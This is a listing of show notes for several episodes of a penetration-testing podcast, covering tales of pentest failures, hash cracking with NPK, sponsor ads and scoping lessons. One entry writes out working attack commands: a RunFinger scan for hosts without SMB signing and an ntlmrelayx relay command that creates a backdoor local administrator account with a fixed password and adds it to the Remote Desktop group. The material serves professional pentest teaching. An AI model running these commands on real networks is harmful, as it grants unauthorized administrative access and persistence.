7MS #501: Tales of Pentest Pwnage - Part 31

I swear this program isn't turning into the Dr. Phil show, but I have to say that sharing tales of fail is extremely therapeutic for me, and based on your comments, it sounds like many of you feel the same way too. Today's takeaways include: Doing a 8-10 hour internal pentest is probably overly ambitious. Seriously, it's really NOT a lot of time. If a client uses a logging/alerting system, vulnerability scanning is very loud to their digital ears Checking for DNS zone transfers is a good idea!

2 Aug 201940min

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Ok, I lied a few episodes ago, and I'm sorry! I was on an epic road trip this week and suddenly remembered the pentest that really had the shortest TTDA (time to domain admin) ever. Enjoy that tale on today's podcast! Oh, and I also reference this gist which might help you test your SIEM bells and whistles. Psssst - I'm sorry (but not sorry) but this episode begins with a long story about a dog pooping inside a dresser drawer. If you'd rather skip that, the actual episode begins at about 29:00)

24 Jul 20191h 12min

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today's episode is a two-tale story of me failing fantastically at vulnerability scanning early in my security career. Enjoy. Because I didn't at the time. :-)

19 Jul 201934min

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode: Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this: opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt Source: Pwning internal networks automagically Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget: net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add So the full command would be: ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add' Check today's show notes at https://7ms.us for more information!

15 Jul 201943min

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute Happy belated 4th of July! Today I've got another fun tale of internal pentest pwnage that comes out of a few recent assessments I did. These tests were really fun because the clients had good defensive measures in place, such as: Having separate accounts for day-to-day operations and administrative/privileged tasks Local Administrator account largely disabled across the enterprise Lean membership in privileged groups (Domain Admins, Enterprise Admins, Schema Admins, etc.) Hard-to-crack passwords! Will I succeed in getting a solid foothold on this network and (hopefully) escalate to Domain Admin? Check out today's episode to find out!

12 Jul 201944min

Hey folks, happy secure 4th o' July! In today's seven minute episode (Wha? Gasp! Yep...it's seven minutes!) I kick back a bit, give you some updates and tease/prepare you for some cool full episodes to come in the near future. Topics covered include: NPK, which I talked about last week is super awesome but I'm having issues getting my jobs to run clean. Will keep you posted on progress! Tales of internal pentest pwnage - wow, folks have been sending me feedback that they really like this series. I've got a good episode coming up for you on that front, just can't share right now as the project is just wrapping up. Songwriting - I enjoy writing songs about people to the tune of the old Spiderman theme song. If they ever do a show like The Voice but they're looking for people to write songs about other people based on the Spiderman theme song, I think I've got a shot.

3 Jul 20197min

Today's episode is brought to you by my friends at safepass.me. Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today I'm having a blast with cracking hashes quickly and cost-effectively using NPK. For 1+ years I've loved my Paperspace config, but lately I've had some reservations about it: People are telling me they're having problems installing the drivers My methodology for building wordlists with HateCrack doesn't seem to work anymore I often pay a lot of $ for idle time since you pay ~$5/month just for the VM itself, and then a buck and change per hour the box is running - even when it's not cracking anything. This week on a pentest I wasn't capturing many hashes, and when I finally did it was a really valuable one. So I wanted to throw more "oomph" at the hash but don't have a ton of days to spare. Enter NPK which lets you submit a hash, decide how much horsepower to throw at it, and even set a max amount of $ to spend on the effort. Super cool! I'm loving it so far! Note: I did have a heck of a time with the install (I'm sure it was a me thing) so I wrote up this gist to help others who might hit the same issue: Happy crackin'!

28 Jun 201919min

This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8. In today's episode, I toss myself under the proverbial security bus and share a tale of pentest fail. Looking back, I think the most important lessons learned were: Scope projects well - I've been part of many over- and under-scoped projects due to PMs and/or sales folks doing an oversimplified calculations, like "URLs times X amount of dollars equals the SOW price." I recommend sending clients a more in-depth questionnaire and even jump on a Web meeting to get a nickel tour of their apps before sending a quote. Train your juniors - IMHO, they should shoulder-surf with more senior engineers a few times and not do much hands-to-keyboard work at first (except maybe helping write the report) until they demonstrate proficiency. Use automated pentest tools with caution - they need proper tuning/care/feeding or they can bring down Web sites and "over test" parameters.

24 Jun 201936min